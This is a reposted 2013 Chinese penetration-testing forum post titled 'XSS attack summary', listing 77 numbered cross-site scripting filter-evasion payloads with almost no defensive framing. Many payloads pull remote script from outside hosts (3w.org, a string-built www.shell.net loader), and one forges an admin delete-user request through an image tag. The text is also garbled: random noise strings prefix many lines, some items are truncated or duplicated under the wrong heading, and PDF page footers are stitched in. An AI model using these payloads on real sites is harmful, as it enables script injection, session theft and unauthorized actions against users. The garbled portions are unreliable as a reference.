中国网络渗透测试联盟

标题: XSS攻击汇总 [打印本页]

---

作者: admin    时间: 2013-4-19 19:22
标题: XSS攻击汇总
貌似关于xss的资料t00ls比较少，看见好东西Copy过来，不知道有木有童鞋需要Mark的。
# P, F- k. o; Y% s/ m(1)普通的XSS JavaScript注入
- Q8 _, ~4 r* [, G$ o( P6 `- P4 r<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2)IMG标签XSS使用JavaScript命令
! q- N! X+ b% p  G) ]3 f  q* C<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
- f# `- U3 w9 O0 ?7 W(3)IMG标签无分号无引号
<IMG SRC=javascript:alert(‘XSS’)>
(4)IMG标签大小写不敏感
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
(5)HTML编码(必须有分号)
<IMG SRC=javascript:alert(“XSS”)>
(6)修正缺陷IMG标签
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
5 Q- ~/ R9 _3 |) W
$ M7 L  ~, m8 ~
(7)formCharCode标签(计算器)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
$ u# I5 E( j& D(8)UTF-8的Unicode编码(计算器)
- a% b* M; ]8 b& W( M- a- |9 e<IMG SRC=jav..省略..S')>
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
<IMG SRC=jav..省略..S')>
8 p- L$ @: H" o2 |+ K(10)十六进制编码也是没有分号(计算器)
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
, f, j3 Q2 J9 ?' S8 \/ z& f(11)嵌入式标签,将Javascript分开
<IMG SRC=”jav ascript:alert(‘XSS’);”>
( l% M+ f% ?: ]! H- h(12)嵌入式编码标签,将Javascript分开
/ I1 q8 b- M( R9 \* B<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 b3 a4 {2 t7 |0 L1 X1 Z(13)嵌入式换行符
<IMG SRC=”jav ascript:alert(‘XSS’);”>
(14)嵌入式回车
<IMG SRC=”jav ascript:alert(‘XSS’);”>
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
& j, W5 {2 q3 f# D- F<IMG SRC=”javascript:alert(‘XSS‘)”>
(16)解决限制字符(要求同页面)
<script>z=’document.’</script>
<script>z=z+’write(“‘</script>
<script>z=z+’<script’</script>
<script>z=z+’ src=ht’</script>
% H6 U1 {' U+ |$ P& s<script>z=z+’tp://ww’</script>
<script>z=z+’w.shell’</script>
<script>z=z+’.net/1.’</script>
<script>z=z+’js></sc’</script>
) F2 J* s7 w( I( E" x3 S6 C5 h<script>z=z+’ript>”)’</script>
<script>eval_r(z)</script>
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
3 T, w5 b* {8 l8 O(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
(19)Spaces和meta前的IMG标签
<IMG SRC=” javascript:alert(‘XSS’);”>
(20)Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
4 m5 W. K: o7 L4 t; E(21)Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
(22)Non-alpha-non-digit XSS to 3
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
% g% O! Z$ o. m4 w(23)双开括号
+ m% G0 R9 N7 [& a<<SCRIPT>alert(“XSS”);//<</SCRIPT>
(24)无结束脚本标记(仅火狐等浏览器)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25)无结束脚本标记2
<SCRIPT SRC=//3w.org/XSS/xss.js>
# Y/ U1 e6 u0 z(26)半开的HTML/JavaScript XSS
  b6 s% }  i% j1 T; A9 O( j1 E9 U<IMG SRC=”javascript:alert(‘XSS’)”
; R6 R5 x) u) S6 N(27)双开角括号
<iframe src=http://3w.org/XSS.html <
(28)无单引号 双引号 分号
<SCRIPT>a=/XSS/
1 T2 a( d) K8 F1 o' d8 r7 falert(a.source)</SCRIPT>
/ a, w0 F, E' h& d/ g8 ~4 V6 {$ c/ }" k7 @(29)换码过滤的JavaScript
\”;alert(‘XSS’);//
(30)结束Title标签
, j4 {9 z% x# x</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
( Q" j& R. Q; O$ v/ e(31)Input Image
2 o6 l. Q% i/ Q5 P<INPUT SRC=”javascript:alert(‘XSS’);”>
' [( Y9 \  x; d. @7 x  {(32)BODY Image
* u5 ^9 ^% w7 x<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
+ b) ~1 s2 e/ w(33)BODY标签
<BODY(‘XSS’)>
, f% S& ?( L' `0 ?+ C. C(34)IMG Dynsrc
# P) Q, q8 D! P+ X, w<IMG DYNSRC=”javascript:alert(‘XSS’)”>
9 M( ?. L- ]; q/ M(35)IMG Lowsrc
0 B5 X9 v$ `& b3 K6 n<IMG LOWSRC=”javascript:alert(‘XSS’)”>
(36)BGSOUND
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
9 g0 U; T3 L( g2 o! {) k2 g6 B/ C( r(37)STYLE sheet
1 _: V/ i- q0 j9 S  r/ p: s/ o<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
(38)远程样式表
7 d, ]. E1 y- I" u9 |<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
(39)List-style-image(列表式)
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
" z! b0 g  P; o9 v* J(40)IMG VBscript
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
( R8 O8 q5 Y1 n(41)META链接url
# |8 _3 ~  I1 r
4 U3 \% h1 k9 m3 J7 z4 i
( U6 F+ e- z: M1 K. j' q; Y6 @5 l% L<META HTTP-EQUIV=”refresh” CONTENT=”0;
URL=http://;URL=javascript:alert(‘XSS’);”>
(42)Iframe
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
(43)Frame
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
0 r4 l6 a' u! o: U1 s% Hhttps://www.t00ls.net/viewthread ... table&tid=15267 3/6
" o- Q. \' v: F: {6 [4 h" `(44)Table
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
- N) ]; l7 S4 h4 z& B(45)TD
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
(46)DIV background-image
2 Q# ~2 e' J2 B& A9 U' A<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
8&13&12288&65279)
: R- m/ ~9 h4 ~  _& W6 I<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
1 K# B* J* w/ V8 k/ a( M(48)DIV expression
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
4 e7 I  ~! A: y5 E1 s(49)STYLE属性分拆表达
1 u1 P4 S5 s2 m$ X# Q0 W<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
(50)匿名STYLE(组成:开角号和一个字母开头)
: @1 H$ G) T) y% p- U, l& \<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
(51)STYLE background-image
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
CLASS=XSS></A>
" e8 b1 T$ p  k' z(52)IMG STYLE方式
+ f0 D. I" y$ M% J/ a9 vexppression(alert(“XSS”))’>
(53)STYLE background
<STYLE><STYLE
8 T0 O; R7 A  J* `! [* Mtype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
& M6 D. `5 c& C2 s7 U3 e' ^(54)BASE
( R# `* t* k# f) ~6 m9 ~. w4 `<BASE HREF=”javascript:alert(‘XSS’);//”>
* s" S0 n9 F% p3 T! T0 {(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
2 r) A+ d' b. r<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
5 w% B% }! r7 w/ u, i( d(56)在flash中使用ActionScrpt可以混进你XSS的代码
% @, s- [- ^7 O4 [1 F0 S4 Ia=”get”;
5 c! O: r- A) D! U" w$ c+ Hb=”URL(\”";
c=”javascript:”;
d=”alert(‘XSS’);\”)”;
+ [9 i0 M7 O* g) Jeval_r(a+b+c+d);
$ ?7 ~5 u& q9 W6 J0 e6 Q8 c5 b(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
<HTML xmlns:xss>
- [9 y- n- A1 F, |* [<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
<xss:xss>XSS</xss:xss>
& ^1 B4 i8 W* J* x</HTML>
, U3 V, `- k* X. T' T( U(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
1 h$ [6 }- N7 r  I# j' O1 R  L<SCRIPT SRC=””></SCRIPT>
  P+ i! p4 n3 D! B; ]9 M  j3 ?" E3 W$ B# K(59)IMG嵌入式命令,可执行任意命令
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
(60)IMG嵌入式命令(a.jpg在同服务器)
4 N. G0 ]0 ~2 ^4 V* NRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61)绕符号过滤
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
(62)
: x$ M* r% u# |0 b$ N) ]; a1 ^7 g1 S<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
6 I' P4 ~7 ^& ^- b(63)
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
(64)
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
(65)
4 S9 D" D7 e3 L3 h<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
; W& E8 D$ q7 ~& R9 ?; b1 I(66)12-7-1 T00LS - Powered by Discuz! Board
7 \% V( U9 {* n( k6 K, e& zhttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
! L! q6 s9 E1 I" p(67)
7 P+ M- w1 X2 z" C<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
& P; F2 F% N6 l7 z; u</SCRIPT>
(68)URL绕行
5 E/ K# e  ^. }( y& V<A HREF=”http://127.0.0.1/”>XSS</A>
  k" J4 B1 w1 b/ w(69)URL编码
) O* T/ r; c$ j2 `: z4 c- h' u( {0 C+ O& o<A HREF=”http://3w.org”>XSS</A>
(70)IP十进制
<A HREF=”http://3232235521″>XSS</A>
(71)IP十六进制
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
$ r5 @' X6 @+ P/ o(72)IP八进制
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
(73)混合编码
0 ]0 z7 J/ Q+ ?" c$ S# q  s" t+ T<A HREF=”h
3 L6 Y% q6 Q3 U+ q8 g" P; Att p://6 6.000146.0×7.147/”">XSS</A>
% B( @- A* M( T(74)节省[http:]
! z' e9 W% @; g5 m" P! u' T<A HREF=”//www.google.com/”>XSS</A>
(75)节省[www]
<A HREF=”http://google.com/”>XSS</A>
(76)绝对点绝对DNS
8 B5 `. P1 ]8 e<A HREF=”http://www.google.com./”>XSS</A>
(77)javascript链接
5 Y9 k2 X  r& u& u# h; C0 m1 C<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
' H, P2 A1 ]- M3 {  n5 Z) o
原文地址：http://fuzzexp.org/u/0day/?p=14

4 i. m- \) @% M7 h/ F0 I

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2